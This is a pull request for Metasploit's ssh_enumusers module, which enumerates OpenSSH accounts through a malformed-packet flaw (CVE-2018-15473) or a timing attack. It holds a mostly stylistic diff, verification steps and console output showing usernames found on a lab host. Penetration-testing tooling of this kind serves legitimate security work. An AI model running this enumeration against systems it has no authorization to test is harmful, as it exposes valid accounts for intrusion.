### PR TITLE
Improve User List Generation For ssh_enumusers

### DIFF
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -9,51 +9,70 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'SSH Username Enumeration',
-      'Description'    => %q{
-        This module uses a malformed packet or timing attack to enumerate users on
-        an OpenSSH server.
+    super(
+      update_info(
+        info,
+        'Name' => 'SSH Username Enumeration',
+        'Description' => %q{
+          This module uses a malformed packet or timing attack to enumerate users on
+          an OpenSSH server.
 
-        The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST
-        packet using public key authentication (must be enabled) to enumerate users.
+          The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST
+          packet using public key authentication (must be enabled) to enumerate users.
 
-        On some versions of OpenSSH under some configurations, OpenSSH will return a
-        "permission denied" error for an invalid user faster than for a valid user,
-        creating an opportunity for a timing attack to enumerate users.
+          On some versions of OpenSSH under some configurations, OpenSSH will return a
+          "permission denied" error for an invalid user faster than for a valid user,
+          creating an opportunity for a timing attack to enumerate users.
 
-        Testing note: invalid users were logged, while valid users were not. YMMV.
-      },
-      'Author'         => [
-        'kenkeiras',     # Timing attack
-        'Dariusz Tytko', # Malformed packet
-        'Michal Sajdak', # Malformed packet
-        'Qualys',        # Malformed packet
-        'wvu'            # Malformed packet
-      ],
-      'References'     => [
-        ['CVE', '2003-0190'],
-        ['CVE', '2006-5229'],
-        ['CVE', '2016-6210'],
-        ['CVE', '2018-15473'],
-        ['OSVDB', '32721'],
-        ['BID', '20418'],
-        ['URL', 'https://seclists.org/oss-sec/2018/q3/124'],
-        ['URL', 'https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/']
-      ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [
-        ['Malformed Packet',
-         'Description' => 'Use a malformed packet',
-         'Type'        => :malformed_packet
+          Testing note: invalid users were logged, while valid users were not. YMMV.
+        },
+        'Author' => [
+          'kenkeiras',     # Timing attack
+          'Dariusz Tytko', # Malformed packet
+          'Michal Sajdak', # Malformed packet
+          'Qualys',        # Malformed packet
+          'wvu'            # Malformed packet
         ],
-        ['Timing Attack',
-         'Description' => 'Use a timing attack',
-         'Type'        => :timing_attack
-        ]
-      ],
-      'DefaultAction'  => 'Malformed Packet'
-    ))
+        'References' => [
+          ['CVE', '2003-0190'],
+          ['CVE', '2006-5229'],
+          ['CVE', '2016-6210'],
+          ['CVE', '2018-15473'],
+          ['OSVDB', '32721'],
+          ['BID', '20418'],
+          ['URL', 'https://seclists.org/oss-sec/2018/q3/124'],
+          ['URL', 'https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/']
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [
+            'Malformed Packet',
+            {
+              'Description' => 'Use a malformed packet',
+              'Type' => :malformed_packet
+            }
+          ],
+          [
+            'Timing Attack',
+            {
+              'Description' => 'Use a timing attack',
+              'Type' => :timing_attack
+            }
+          ]
+        ],
+        'DefaultAction' => 'Malformed Packet',
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [
+            CRASH_SERVICE_DOWN # possible that a malformed packet may crash the service
+          ],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            ACCOUNT_LOCKOUTS, # timing attack submits a password
+          ]
+        }
+      )
+    )
 
     register_options(
       [
@@ -64,9 +83,11 @@ class MetasploitModule < Msf::Auxiliary
         OptPath.new('USER_FILE',
                     [false, 'File containing usernames, one per line']),
         OptInt.new('THRESHOLD',
-                   [true,
-                   'Amount of seconds needed before a user is considered ' \
-                   'found (timing attack only)', 10]),
+                   [
+                     true,
+                     'Amount of seconds needed before a user is considered ' \
+                     'found (timing attack only)', 10
+                   ]),
         OptBool.new('CHECK_FALSE',
                     [false, 'Check for false positives (random username)', false])
       ]
@@ -75,14 +96,20 @@ class MetasploitModule < Msf::Auxiliary
     register_advanced_options(
       [
         OptInt.new('RETRY_NUM',
-                   [true , 'The number of attempts to connect to a SSH server' \
-                   ' for each user', 3]),
+                   [
+                     true, 'The number of attempts to connect to a SSH server' \
+                   ' for each user', 3
+                   ]),
         OptInt.new('SSH_TIMEOUT',
-                   [false, 'Specify the maximum time to negotiate a SSH session',
-                   10]),
+                   [
+                     false, 'Specify the maximum time to negotiate a SSH session',
+                     10
+                   ]),
         OptBool.new('SSH_DEBUG',
-                    [false, 'Enable SSH debugging output (Extreme verbosity!)',
-                    false])
+                    [
+                      false, 'Enable SSH debugging output (Extreme verbosity!)',
+                      false
+                    ])
       ]
     )
   end
@@ -109,27 +136,27 @@ class MetasploitModule < Msf::Auxiliary
     technique = action['Type']
 
     opts = {
-      :port            => port,
-      :use_agent       => false,
-      :config          => false,
-      :proxy           => ssh_socket_factory,
-      :non_interactive => true,
-      :verify_host_key => :never
+      port: port,
+      use_agent: false,
+      config: false,
+      proxy: ssh_socket_factory,
+      non_interactive: true,
+      verify_host_key: :never
     }
 
     # The auth method is converted into a class name for instantiation,
     # so malformed-packet here becomes MalformedPacket from the mixin
     case technique
     when :malformed_packet
-      opts.merge!(:auth_methods => ['malformed-packet'])
+      opts.merge!(auth_methods: ['malformed-packet'])
     when :timing_attack
       opts.merge!(
-        :auth_methods => ['password', 'keyboard-interactive'],
-        :password     => rand_pass
+        auth_methods: ['password', 'keyboard-interactive'],
+        password: rand_pass
       )
     end
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     start_time = Time.new
 
@@ -163,7 +190,7 @@ class MetasploitModule < Msf::Auxiliary
     Rex::Text.rand_text_english(64_000..65_000)
   end
 
-  def do_report(ip, user, port)
+  def do_report(ip, user, _port)
     service_data = {
       address: ip,
       port: rport,
@@ -175,12 +202,12 @@ class MetasploitModule < Msf::Auxiliary
     credential_data = {
       origin_type: :service,
       module_fullname: fullname,
-      username: user,
+      username: user
     }.merge(service_data)
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::UNTRIED
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -188,7 +215,7 @@ class MetasploitModule < Msf::Auxiliary
 
   # Because this isn't using the AuthBrute mixin, we don't have the
   # usual peer method
-  def peer(rhost=nil)
+  def peer(rhost = nil)
     "#{rhost}:#{rport} - SSH -"
   end
 
@@ -208,9 +235,9 @@ class MetasploitModule < Msf::Auxiliary
     attempt_num = 0
     ret = nil
 
-    while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
+    while (attempt_num <= retry_num) && (ret.nil? || (ret == :connection_error))
       if attempt_num > 0
-        Rex.sleep(2 ** attempt_num)
+        Rex.sleep(2**attempt_num)
         vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")
       end
 


### PR DESCRIPTION
This fixes a bug that was privately reported to us in regards to how the `ssh_enumusers` module generates it's user list. The core of the issue was that when both a USERNAME and USER_FILE were specified, they were not both used. This issue has been fixed by improving the user list generation method to accept and process both options. The `DB_ALL_USERS` option was added too so while this module isn't a credential scanner, it has similar functionality for the generation of usernames.

Also rubocop fixes in 05b3c3535d23397de218d6c8c133409482791e19.

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/ssh/ssh_enumusers`
- [ ] Set an RHOST
- [ ] Run the module and see it complain that no user-related options were set
- [ ] Set a `USERNAME` see it work
- [ ] Set a `USER_FILE` see it work, also see the specific USERNAME included even if it wasn't an item in the file
- [ ] Enable `DB_ALL_USERS` see even more users tried
- [ ] Disable the database and run the module again, see warnings that the DB_ALL_USERS option is ignored because the database is disconnected.

## Demo

<details>
<summary>Demo Output</summary>

There's a bit in here but it shows the USERNAME, USER_FILE and DB_ALL_USERS options being used together.

```
msf6 auxiliary(scanner/ssh/ssh_enumusers) > rerun
[*] Reloading module...

[-] Auxiliary aborted due to failure: bad-config: Please populate DB_ALL_USERS, USER_FILE, USERNAME
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.250.56:22 - SSH - Using malformed packet technique
[*] 192.168.250.56:22 - SSH - Starting scan
[+] 192.168.250.56:22 - SSH - User 'root' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set DB_ALL_USERS
DB_ALL_USERS => false
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.250.56:22 - SSH - Using malformed packet technique
[*] 192.168.250.56:22 - SSH - Starting scan
[+] 192.168.250.56:22 - SSH - User 'root' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set DB_ALL_USERS true
DB_ALL_USERS => true
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.250.56:22 - SSH - Using malformed packet technique
[*] 192.168.250.56:22 - SSH - Starting scan
[+] 192.168.250.56:22 - SSH - User 'root' found
[+] 192.168.250.56:22 - SSH - User 'WIN-3MSP8K2LCGC$' found
[+] 192.168.250.56:22 - SSH - User 'spencer mcintyre' found
[+] 192.168.250.56:22 - SSH - User 'smcintyre' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /tmp/test.txt
USER_FILE => /tmp/test.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.250.56:22 - SSH - Using malformed packet technique
[*] 192.168.250.56:22 - SSH - Starting scan
[+] 192.168.250.56:22 - SSH - User 'root' found
[+] 192.168.250.56:22 - SSH - User 'smcintyre' found
[+] 192.168.250.56:22 - SSH - User 'pacman' found
[+] 192.168.250.56:22 - SSH - User 'WIN-3MSP8K2LCGC$' found
[+] 192.168.250.56:22 - SSH - User 'spencer mcintyre' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > db_
db_connect        db_disconnect     db_export         db_import         db_nmap           db_rebuild_cache  db_remove         db_save           db_status         
msf6 auxiliary(scanner/ssh/ssh_enumusers) > db_disconnect 
Successfully disconnected from the data service: local_db_service.
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[!] No active DB -- The following option will be ignored: DB_ALL_USERS
[*] 192.168.250.56:22 - SSH - Using malformed packet technique
[!] No active DB -- The following option will be ignored: DB_ALL_USERS
[*] 192.168.250.56:22 - SSH - Starting scan
[+] 192.168.250.56:22 - SSH - User 'root' found
[+] 192.168.250.56:22 - SSH - User 'smcintyre' found
[+] 192.168.250.56:22 - SSH - User 'pacman' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /tmp/doesnotexist
USER_FILE => /tmp/doesnotexist
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[-] Msf::OptionValidateError The following options failed to validate: USER_FILE
msf6 auxiliary(scanner/ssh/ssh_enumusers) > 
```
</details>